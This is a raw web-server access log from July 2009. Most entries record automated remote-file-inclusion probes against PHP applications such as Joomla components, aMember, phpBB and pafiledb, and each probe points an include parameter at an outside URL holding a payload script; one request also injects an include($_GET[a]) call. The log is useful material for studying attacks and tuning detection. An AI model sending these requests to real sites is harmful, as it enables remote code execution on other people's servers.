213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:23 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:24 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:02:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [06/Jul/2009:03:02:57 -0400] "GET //index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:02:57 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:02:57 -0400] "GET /logs/access_log.Q109063000//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:02:59 -0400] "GET //index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:02:59 -0400] "GET /logs//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:02:59 -0400] "GET /logs/access_log.Q109063000//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:03:44 -0400] "GET /logs/access_log.Q109052600//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:03:03:44 -0400] "GET /logs/access_log.Q109052600//index2.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:03:03:46 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
216.117.128.143 - - [06/Jul/2009:03:05:55 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:03:06:07 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:07:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.245.146.253 - - [06/Jul/2009:03:07:34 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:07:34 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:07:34 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:03:07:45 -0400] "GET /e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:03:07:45 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:07:45 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:03:07:45 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:07:45 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:07:45 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:08:04 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:03:08:04 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:08:07 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:08:28 -0400] "GET /logs/access_log.Q109051300/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:08:33 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:03:08:56 -0400] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:03:08:56 -0400] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:03:08:56 -0400] "GET /logs/access_log.Q109060500%20%20//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:09:30 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:09:31 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:09:31 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:03:09:47 -0400] "GET /e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
67.208.139.72 - - [06/Jul/2009:03:09:47 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:03:09:54 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://game24x7.com/_a?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:09:58 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:09:58 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:10:03 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:10:16 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:10:40 -0400] "GET /logs/access_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:10:49 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:03:11:05 -0400] "GET /images/items/0100391_thumb.jpg HTTP/1.1" 200 1848 "-" "Googlebot-Image/1.0"
125.245.146.253 - - [06/Jul/2009:03:11:16 -0400] "GET /logs/access_log.Q109050800%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:03:11:19 -0400] "GET /logs/access_log.Q109052000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.207.160.102 - - [06/Jul/2009:03:11:19 -0400] "GET /e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:11:19 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:11:19 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:11:25 -0400] "GET /logs/access_log.Q109051300%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:11:37 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:11:49 -0400] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:11:49 -0400] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:03:11:54 -0400] "GET /logs/access_log.Q109060500%20%20//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:03:12:05 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:03:12:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:03:12:06 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
209.59.12.99 - - [06/Jul/2009:03:12:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [06/Jul/2009:03:12:40 -0400] "GET /logs/access_log.Q109060500//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
125.245.146.253 - - [06/Jul/2009:03:12:41 -0400] "GET /e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:12:41 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:12:45 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:02 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:13:04 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:06 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:06 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:10 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:10 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:11 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:13:49 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:14:11 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:15:23 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:15:37 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:16:03 -0400] "GET /logs/error_log.Q109041400%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:16:33 -0400] "GET /logs/access_log.Q109060600%20%20/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.97.61.43 - - [06/Jul/2009:03:16:41 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.68.247 - - [06/Jul/2009:03:16:45 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [06/Jul/2009:03:16:45 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L213EC74977E3E400587001B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [06/Jul/2009:03:16:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L213EC74978335400577001B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [06/Jul/2009:03:17:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.65.36 - - [06/Jul/2009:03:17:40 -0400] "GET /logs/access_log.Q108061200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.230.9.68 - - [06/Jul/2009:03:17:41 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:17:42 -0400] "GET /logs/access_log.Q109060200/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:17:42 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.230.9.68 - - [06/Jul/2009:03:17:42 -0400] "GET /logs/access_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
195.34.78.110 - - [06/Jul/2009:03:17:52 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:17:53 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:17:53 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.236.242.164 - - [06/Jul/2009:03:18:48 -0400] "GET /logs/access_log.Q109060200/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:03:18:48 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:03:18:48 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:03:18:48 -0400] "GET /logs/access_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
217.125.38.117 - - [06/Jul/2009:03:18:52 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:18:53 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:00 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:00 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:00 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:19:07 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:07 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:10 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:10 -0400] "GET /logs/access_log.Q109060100/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:19:46 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:19:46 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:19:46 -0400] "GET //include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:19:46 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:03:19:47 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:19:58 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:03:20:00 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:20:01 -0400] "GET /e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:20:04 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:20:06 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.207.160.102 - - [06/Jul/2009:03:20:33 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:03:20:46 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:03:22:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.123.96 - - [06/Jul/2009:03:22:13 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.108.123.96 - - [06/Jul/2009:03:22:14 -0400] "GET /logs/access_log.Q109060200/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.108.123.96 - - [06/Jul/2009:03:22:14 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.108.123.96 - - [06/Jul/2009:03:22:19 -0400] "GET /logs/access_log.Q109052800/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
204.9.247.53 - - [06/Jul/2009:03:23:13 -0400] "GET /logs/access_log.Q109061100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:13 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
204.9.247.53 - - [06/Jul/2009:03:23:13 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
